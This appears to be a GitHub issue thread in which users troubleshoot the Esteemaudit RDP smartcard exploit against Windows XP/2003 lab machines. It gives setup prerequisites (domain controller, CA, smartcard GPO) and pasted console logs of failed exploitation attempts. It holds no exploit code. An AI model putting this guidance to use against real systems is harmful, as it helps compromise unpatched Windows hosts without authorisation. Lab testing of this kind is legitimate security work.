Open f4rb3r1o opened 7 years ago
Hi @liad1234, which OS is your target and it's on a domain or not?
hi, the os is Windows XP Professional x64 Edition SP1 not on a domain.
@liad1234 the most rapid solution to testing the exploit is to virtualize two machine, a windows server edition from 2003 till 2012r2 to do as domain controller and a windows server 2003 or XP to do as Target. The exploit works only on a domain infrastructure, this is because it needs a CA to validate the certificate inside the logon request for smartcard authentication and it will create the callback needed to trigger the exploit. By default every domain controller applies a GPO that will authorize the machine target to log in with RDP smartcard logon.
thank you very much, do you have maybe any link that describe the vulnerablity + the depndencies ? (sorry to bother)
Hi,
I am experiencing the same Connection Timeout problems:
root@kali:/usr/share/esteemaudit# wine Esteemaudit-2.1.0.exe [] Creating callback socket [+] Listening on 0.0.0.0:444 [+] Callback socket creation complete [+] Connected to target 192.168.55.100:3389 [+] Sending Space Bar [] Building exploit buffer. [+] Exploit buffer created. [+] Sending Enter key [+] SELECT_FILE - GPK Card MF [+] GET_RESPONSE - data unit size [+] GET_RESPONSE - serial number [+] SELECT_FILE - GPK Card MF [+] SELECT_FILE - Don't care which [+] GET_RESPONSE - from SELECT_FILE [+] READ_BINARY - unknown offset [+] SELECT_FILE - Don't care which [+] GET_RESPONSE - from SELECT_FILE [+] READ_BINARY - start of file [+] Shellcode sent [+] SELECT_FILE - GPK Card MF [*] First stage complete [-] Connection timeout (exceeded computed threshold of 10.00 seconds) [-] Exploit NOT successful :-(
My scenario is:
The Victim is accesible using RDP with administrator account.
It is a really interesting lab to work with this exploit. Well done!
Thanks a lot and I am looking forward your news.
hi friend, well done about the effort ! i have a little problem. after looking at most of the issues and trying to solved it myself, i decided to write you. after following the whole process and debug fix some problems myself, i'm getting this message: [-] 10.0.0.42:3389 - The machine is not vulnerable! . when going to the containing folder and execute : wine Esteemaudit-2.1.0.exe i'm getting :
[*] Creating callback socket [+] Listening on 0.0.0.0:0 [+] Callback socket creation complete [+] Connected to target 10.0.0.42:3389 [+] Sending Space Bar [-] Connection timeout (exceeded computed threshold of 10.00 seconds) [-] Exploit NOT successful :-(
please help, regards.